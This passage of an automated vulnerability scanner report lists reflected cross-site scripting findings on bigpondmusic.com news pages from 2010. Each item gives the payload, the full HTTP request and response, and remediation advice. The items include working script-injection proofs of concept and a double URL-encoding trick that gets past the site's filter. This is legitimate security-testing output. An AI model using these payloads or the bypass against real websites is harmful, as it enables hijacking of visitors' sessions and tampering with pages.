...[SNIP]...

2.352. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dc9d'%3b6f3698c74c8 was submitted in the REST URL parameter 2. This input was echoed as 1dc9d';6f3698c74c8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/article1dc9d'%3b6f3698c74c8/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87990


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'article1dc9d';6f3698c74c8';
   s.prop5 = '5078';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.353. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29522%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527736eba7615e was submitted in the REST URL parameter 4. This input was echoed as 29522'style='x:expression(alert(1))'736eba7615e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child29522%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527736eba7615e HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103304


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jay-Z opens up about shootin
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child29522'style='x:expression(alert(1))'736eba7615e' />
...[SNIP]...

2.354. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3e3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cdca9587b7 was submitted in the REST URL parameter 4. This input was echoed as f3e3f"><script>alert(1)</script>2cdca9587b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-childf3e3f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2cdca9587b7 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103355


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jay-Z opens up about shootin
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-childf3e3f"><script>alert(1)</script>2cdca9587b7" />
...[SNIP]...

2.355. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54bba"style%3d"x%3aexpression(alert(1))"aa54df856a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54bba"style="x:expression(alert(1))"aa54df856a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child?54bba"style%3d"x%3aexpression(alert(1))"aa54df856a=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Jay-Z opens up about shootin
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child?54bba"style="x:expression(alert(1))"aa54df856a=1" />
...[SNIP]...

2.356. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2942c'%3b09aa9546100 was submitted in the REST URL parameter 1. This input was echoed as 2942c';09aa9546100 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news2942c'%3b09aa9546100/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88170


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news2942c';09aa9546100';
   s.prop4 = 'article';
   s.prop5 = '5079';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.357. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d613c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef452a1d72c7 was submitted in the REST URL parameter 1. This input was echoed as d613c"><script>alert(1)</script>f452a1d72c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /newsd613c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef452a1d72c7/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88138


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/newsd613c"><script>alert(1)</script>f452a1d72c7/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list" />
...[SNIP]...

2.358. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e486%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c24b6ca955 was submitted in the REST URL parameter 2. This input was echoed as 3e486"><script>alert(1)</script>7c24b6ca955 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article3e486%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7c24b6ca955/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article3e486"><script>alert(1)</script>7c24b6ca955/5079/bieber-eminem-gaga-the-2010-amas-winners-list" />
...[SNIP]...

2.359. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e086'%3b7d3006b93d9 was submitted in the REST URL parameter 2. This input was echoed as 2e086';7d3006b93d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/article2e086'%3b7d3006b93d9/5079/bieber-eminem-gaga-the-2010-amas-winners-list HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:17:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87984


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'article2e086';7d3006b93d9';
   s.prop5 = '5079';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.360. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1e0da%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ed7bd17400c was submitted in the REST URL parameter 4. This input was echoed as 1e0da'style='x:expression(alert(1))'ed7bd17400c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list1e0da%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ed7bd17400c HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 311459


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bieber, Eminem, GaGa - The 2
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list1e0da'style='x:expression(alert(1))'ed7bd17400c' />
...[SNIP]...

2.361. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b02%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e31b5d1e0361 was submitted in the REST URL parameter 4. This input was echoed as 29b02"><script>alert(1)</script>31b5d1e0361 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list29b02%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e31b5d1e0361 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 311872


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bieber, Eminem, GaGa - The 2
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list29b02"><script>alert(1)</script>31b5d1e0361" />
...[SNIP]...

2.362. http://bigpondmusic.com/news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80616"style%3d"x%3aexpression(alert(1))"94e4edbecb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80616"style="x:expression(alert(1))"94e4edbecb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/article/5079/bieber-eminem-gaga-the-2010-amas-winners-list?80616"style%3d"x%3aexpression(alert(1))"94e4edbecb9=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 311124


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


